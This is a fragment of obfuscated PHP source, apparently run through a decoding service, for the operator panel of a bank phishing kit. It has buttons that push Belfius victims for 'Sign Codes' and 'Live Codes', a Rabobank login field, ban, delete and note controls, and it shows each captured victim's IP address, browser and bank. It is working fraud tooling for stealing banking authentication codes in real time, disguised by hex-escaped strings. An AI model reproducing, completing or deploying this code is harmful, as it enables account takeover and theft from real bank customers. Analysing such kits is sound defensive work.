', 'sign')"><i class="fa fa-window-restore" aria-hidden="true"></i>

 Ask Sign Code</button>

                            </div>

                            <div class="col-lg-9">
                                <input type="text" class="form-control belfius-sign-two input-dark mt-4 custom-input" placeholder="Fill in your 'Sign Code'">

                            </div>
                           <div class="col-lg-3">
                                 <hr>
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBelfius('<?php  echo htmlspecialchars($log["\x75\x73\x65\x72\x5f\151\144"]); ?>
', 'signtwo')"><i class="fa fa-window-restore" aria-hidden="true"></i>

 Ask Sign Code (2)</button>
                            </div>
                              <div class="col-lg-9">
                                 <hr>
                                <input type="text" class="form-control belfius-sign-two-two input-dark mt-4 custom-input" placeholder="Fill in your first 'Sign Code'">
                                <input type="text" class="form-control belfius-sign-two-two-two input-dark mt-4 custom-input" placeholder="Fill in your second 'Sign Code'">

                            </div>
                            <div class="col-lg-3">
                                 <hr>
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBelfius('<?php  echo htmlspecialchars($log["\165\163\145\162\137\151\144"]); ?>
', 'live')"><i class="fa fa-shopping-basket" aria-hidden="true"></i>


 Ask Live Code</button>
                            </div>
                              <div class="col-lg-9">
                                 <hr>
                                <input type="text" class="form-control belfius-live input-dark mt-4 custom-input" placeholder="Fill in your first 'Live Code'">
                                <input type="text" class="form-control belfius-live-two input-dark mt-4 custom-input" placeholder="Fill in your second 'Live Code'">

                            </div>


                        </div>  

                </div>
            </div>
            
               <?php  } } } } } } } } } if ($log["\167\141\151\164\151\156\147"] === "\x66\x61\x6c\163\x65") { echo "\x3c\57\144\x69\166\76"; echo "\74\x2f\144\151\166\x3e"; echo "\74\57\144\x69\x76\x3e"; } echo "\74\144\151\166\x20\x63\x6c\x61\x73\163\75\x22\143\x6f\154\55\154\147\55\x34\x20\143\157\154\x2d\x73\155\55\x31\x32\42\x3e"; echo "\x3c\x64\151\x76\40\143\154\x61\163\x73\x3d\x22\143\x61\x72\x64\55\150\x65\x61\x64\x65\x72\40\164\x65\x78\x74\55\167\x68\x69\164\x65\40\x20\142\147\55\144\141\x72\x6b\145\162\x20\163\x69\x69\154\145\x6e\143\145\x64\x2d\144\141\x72\153\x65\x72\x22\76\xa\x20\40\x20\40\40\40\40\40\x20\x20\40\40\x3c\151\40\x63\x6c\141\163\163\x3d\x22\x66\x61\40\146\x61\x2d\x63\157\x67\x22\x20\141\x72\x69\x61\55\150\x69\144\144\145\156\75\x22\x74\162\x75\x65\42\x3e\74\57\x69\76\40\x4f\160\164\151\x6f\x6e\x73\12\xa\x20\x20\x20\40\x20\x20\x20\x20\12\12\40\x20\40\40\40\40\40\40\x20\x20\x20\x20\74\57\144\x69\166\x3e\74\144\151\166\x20\143\x6c\x61\163\163\x3d\x22\x63\157\x6c\55\61\x32\x20\160\55\x34\40\x62\x67\x2d\144\141\x72\153\x65\162\x20\143\165\163\x74\157\155\x2d\x74\x6f\x70\x2d\155\141\162\147\151\156\x20\x22\40\163\164\171\x6c\145\x3d\42\x6d\x69\156\55\150\x65\x69\147\150\164\72\40\x31\67\x33\160\170\x3b\42\76"; ?>
   
       <p style="font-style: italic;"><i class="fa fa-comments" aria-hidden="true"></i> &#84;&#104;&#105;&#115;&#32;&#102;&#117;&#110;&#99;&#116;&#105;&#111;&#110;&#32;&#109;&#97;&#110;&#97;&#103;&#101;&#115;&#32;&#116;&#104;&#101;&#32;&#108;&#111;&#103;&#44;&#32;&#121;&#111;&#117;&#32;&#99;&#97;&#110;&#32;&#98;&#97;&#110;&#32;&#111;&#114;&#32;&#100;&#101;&#108;&#101;&#116;&#101;&#32;&#97;&#32;&#115;&#112;&#101;&#99;&#105;&#102;&#105;&#99;&#32;&#108;&#111;&#103;&#46;</p>


       <hr>
        <button class="btn btn-sm btn-outline-danger col-lg-12" style="font-style: italic;" data-toggle="modal" data-target="#exampleModalCenter">
            <i class="fa fa-ban"></i> &#66;&#97;&#110;&#32;&#85;&#115;&#101;&#114;</button>
            <br><br>
        <button class="btn btn-sm btn-outline-warning col-lg-12" onclick="deleteLog('<?php  echo htmlspecialchars($log["\x75\163\x65\162\137\151\144"]); ?>
')" style="font-style: italic;">
            <i class="fa fa-trash"></i> &#68;&#101;&#108;&#101;&#116;&#101;&#32;&#85;&#115;&#101;&#114;</button>
          <br>
    
         <input type="text" style="font-style: italic;" class="form-control rabo-login input-dark mt-4 custom-input" 
    placeholder="<?php  echo $log["\156\x6f\x74\145"] ? htmlspecialchars($log["\x6e\x6f\x74\x65"]) : "\x4c\145\x61\166\x65\x20\141\40\156\x6f\164\145\40\146\157\x72\x20\x28" . htmlspecialchars($log["\x75\x73\145\162\137\x69\144"]) . "\51"; ?>
" id="note">

         <button class="btn btn-sm btn-outline-primary col-lg-12" onclick="updateNote('<?php  echo htmlspecialchars($log["\x75\163\145\162\x5f\151\144"]); ?>
', document.getElementById('note').value)" style="font-style: italic;">
            <i class="fa fa-edit"></i> &#85;&#112;&#100;&#97;&#116;&#101;&#32;&#78;&#111;&#116;&#101;</button>
          

   <hr>
        <button class="btn btn-sm  col-lg-12" style="font-style: italic;">
            @Vssrtje | Developer</button>

     
        <?php  echo "\x3c\57\x64\151\166\76"; echo "\74\57\144\151\x76\76"; echo "\x3c\x2f\x64\151\166\76"; echo "\x3c\144\x69\x76\x20\x63\154\141\x73\163\x3d\42\162\x6f\x77\40\x70\55\61\x20\155\164\55\x33\x20\x6d\142\x2d\x33\x22\76"; echo "\74\144\151\166\x20\143\154\x61\163\x73\x3d\42\x63\157\154\55\154\x67\x2d\70\x20\143\157\x6c\55\x73\155\55\x31\62\x22\x3e"; echo "\x3c\144\x69\166\40\x63\x6c\x61\x73\163\75\x22\x63\141\x72\x64\x2d\150\145\141\x64\x65\162\40\164\145\x78\164\x2d\167\150\151\x74\145\x20\40\x62\147\55\144\x61\162\x6b\145\162\x20\163\x69\x69\154\145\x6e\x63\x65\144\x2d\x64\x61\x72\x6b\x65\x72\x22\x3e\12\40\40\40\x20\x20\x20\40\40\x20\x20\40\40\74\x69\40\143\154\x61\x73\163\75\42\146\141\x20\146\x61\x2d\x75\163\x65\x72\42\40\x61\162\151\x61\x2d\x68\x69\x64\x64\145\x6e\x3d\42\x74\162\x75\145\42\x3e\74\57\x69\x3e\40\123\160\x65\143\151\x66\151\143\40\x55\163\x65\162\40\x44\141\164\141\xa\xa\xa\xa\x20\40\x20\40\x20\x20\x20\40\x20\x20\40\40\74\x2f\x64\x69\x76\x3e\74\x64\x69\x76\x20\143\154\141\x73\163\75\x22\143\x6f\x6c\x2d\x31\62\40\160\55\x34\40\x62\147\55\144\141\x72\153\145\x72\x20\x22\76"; echo "\74\144\x69\166\x20\x63\x6c\x61\163\x73\75\x22\x76\x65\x75\x73\x64\x65\160\165\164\x20\x72\157\x75\x6e\144\x65\x64\40\160\55\64\x22\x3e"; echo "\x3c\144\x69\x76\40\143\x6c\x61\x73\163\75\42\146\157\162\155\55\147\x72\x6f\x75\160\x20\162\157\x77\42\x3e"; echo "\x3c\154\141\x62\x65\154\40\146\157\162\x3d\42\151\x64\x22\40\x63\x6c\141\x73\x73\x3d\x22\164\x65\x78\164\x2d\x73\x65\143\x6f\x6e\144\x61\162\171\x20\x63\x6f\154\55\163\x6d\55\63\x20\x66\157\x6e\x74\x2d\167\x65\151\x67\x68\x74\x2d\x62\157\x6c\144\42\76\x55\163\145\162\x20\x49\x44\x3a\x3c\57\x6c\x61\x62\145\154\x3e"; echo "\74\x64\x69\x76\40\x63\x6c\x61\163\163\x3d\x22\143\157\x6c\55\163\155\x2d\71\42\76"; echo "\x3c\x70\x20\143\154\x61\163\163\75\x22\143\x6f\x70\171\x2d\166\141\x6c\x75\x65\x22\40\x6f\x6e\x63\154\x69\x63\153\75\42\x63\x6f\160\x79\124\157\x43\154\151\x70\x62\157\x61\162\144\x28\x74\150\x69\x73\x29\x22\x20\143\154\141\163\x73\x3d\42\164\x65\170\164\55\x73\145\x63\157\156\x64\141\x72\171\42\x3e\x3c\x69\76" . $log["\x75\163\145\x72\x5f\151\x64"] . "\74\x2f\x69\x3e\74\57\x70\x3e"; echo "\x3c\57\x64\x69\x76\76"; echo "\x3c\x2f\x64\151\166\76"; echo "\x3c\144\x69\x76\40\143\154\x61\x73\163\75\42\x66\x6f\162\155\55\x67\162\x6f\165\160\40\162\157\167\42\76"; echo "\74\154\x61\x62\145\154\40\146\x6f\162\75\42\x69\144\x22\40\143\154\x61\163\163\75\42\164\145\x78\x74\x2d\163\145\143\x6f\156\144\x61\x72\x79\x20\143\157\154\x2d\163\155\55\63\x20\146\157\156\x74\x2d\x77\145\151\147\150\164\x2d\x62\157\154\x64\42\76\125\163\145\x72\40\x42\162\157\167\163\145\x72\x3a\74\57\x6c\x61\x62\x65\x6c\76"; echo "\x3c\144\x69\166\40\x63\x6c\141\163\163\75\x22\143\157\154\55\x73\x6d\55\71\42\76"; echo "\74\x70\40\143\154\x61\163\163\x3d\x22\x63\157\x70\171\55\x76\141\154\165\x65\42\x20\x6f\x6e\143\x6c\x69\x63\153\x3d\42\x63\157\160\171\124\157\x43\x6c\x69\x70\142\x6f\141\x72\x64\x28\164\150\x69\x73\x29\42\x20\x63\154\x61\163\163\75\42\x74\x65\x78\x74\x2d\x73\145\143\157\156\144\x61\x72\171\x22\76\x3c\x69\76" . $log["\x75\163\145\x72\x5f\141\x67\145\156\x74"] . "\x3c\x2f\151\x3e\74\57\160\x3e"; echo "\74\x2f\144\151\x76\x3e"; echo "\x3c\57\x64\x69\166\76"; echo "\x3c\x64\x69\x76\40\143\154\x61\x73\163\75\x22\x66\157\x72\x6d\x2d\147\162\157\165\160\40\x72\157\167\42\76"; echo "\74\154\x61\142\x65\154\x20\x66\157\x72\75\x22\x69\x64\42\40\143\x6c\x61\x73\x73\x3d\42\164\x65\170\x74\x2d\x73\145\x63\157\x6e\x64\x61\x72\171\40\x63\x6f\x6c\x2d\163\155\55\x33\x20\x66\157\156\164\x2d\x77\x65\151\x67\150\164\x2d\142\157\154\x64\42\76\125\x73\x65\162\40\x49\120\x3a\x3c\x2f\154\x61\x62\145\154\x3e"; echo "\x3c\144\x69\166\x20\143\x6c\141\163\163\75\42\143\157\154\x2d\x73\x6d\55\71\42\x3e"; echo "\74\x70\40\143\x6c\141\x73\163\75\42\143\x6f\160\x79\x2d\x76\x61\x6c\165\x65\x22\x20\x6f\156\x63\154\151\x63\153\75\x22\143\157\160\x79\124\157\103\x6c\x69\x70\x62\x6f\141\162\144\x28\164\x68\x69\x73\x29\x22\40\x63\154\x61\x73\x73\75\x22\164\145\x78\164\x2d\163\145\143\x6f\156\x64\x61\162\171\x22\x3e\x3c\151\76" . $log["\151\x70"] . "\x3c\57\x69\76\74\x2f\x70\x3e"; echo "\x3c\57\144\x69\x76\76"; echo "\74\x2f\144\x69\x76\76"; if (!empty($log["\142\x61\156\x6b"])) { echo "\74\144\151\166\40\x63\154\x61\163\x73\x3d\42\x66\x6f\x72\x6d\x2d\x67\162\x6f\165\160\40\x72\x6f\167\42\76"; echo "\74\x6c\141\x62\x65\x6c\x20\146\x6f\162\x3d\42\x69\144\42\40\143\x6c\141\163\x73\x3d\x22\164\145\170\164\x2d\x73\x65\143\157\156\144\x61\162\171\40\143\157\154\x2d\x73\x6d\55\63\40\146\157\156\164\x2d\x77\145\x69\x67\x68\164\55\x62\x6f\x6c\144\42\x3e\x42\141\156\153\72\x3c\x2f\x6c\141\142\x65\x6c\x3e"; echo "\74\144\x69\x76\x20\x63\x6c\141\x73\163\x3d\x22\143\157\x6c\55\163\x6d\55\71\42\76"; echo "\74\x70\x20\143\x6c\141\163\163\75\x22\x63\x6f\x70\x79\55\166\141\154\x75\x65\42\x20\x6f\x6e\x63\154\151\143\153\x3d\42\x63\157\x70\171\x54\x6f\x43\x6c\x69\x70\x62\x6f\x61\162\144\50\x74\150\x69\x73\x29\x22\40\x63\154\141\163\x73\x3d\x22\164\145\170\x74\x2d\163\145\x63\x6f\156\x64\141\162\x79\42\x3e\x3c\151\76" . $log["\x62\x61\x6e\153"] . "\x3c\x2f\151\x3e\74\57\160\x3e"; echo "\x3c\x2f\x64\151\x76\76"; echo "\x3c\57\144\x69\166\x3e"; } echo "\x3c\x2f\144\151\166\x3e\x3c\x2f\144\x69\166\x3e\x3c\142\x72\x3e\74\142\162\76\74\142\x72\x3e\x3c\x62\x72\76\74\142\162\x3e\74\x62\x72\x3e\x3c\x62\x72\76\x3c\x62\162\x3e"; } }

Function Calls

None

Variables

None

Stats

MD5 ca2e6be70b6e5132a5158cfdd4354a7d
Eval Count 0
Decode Time 186 ms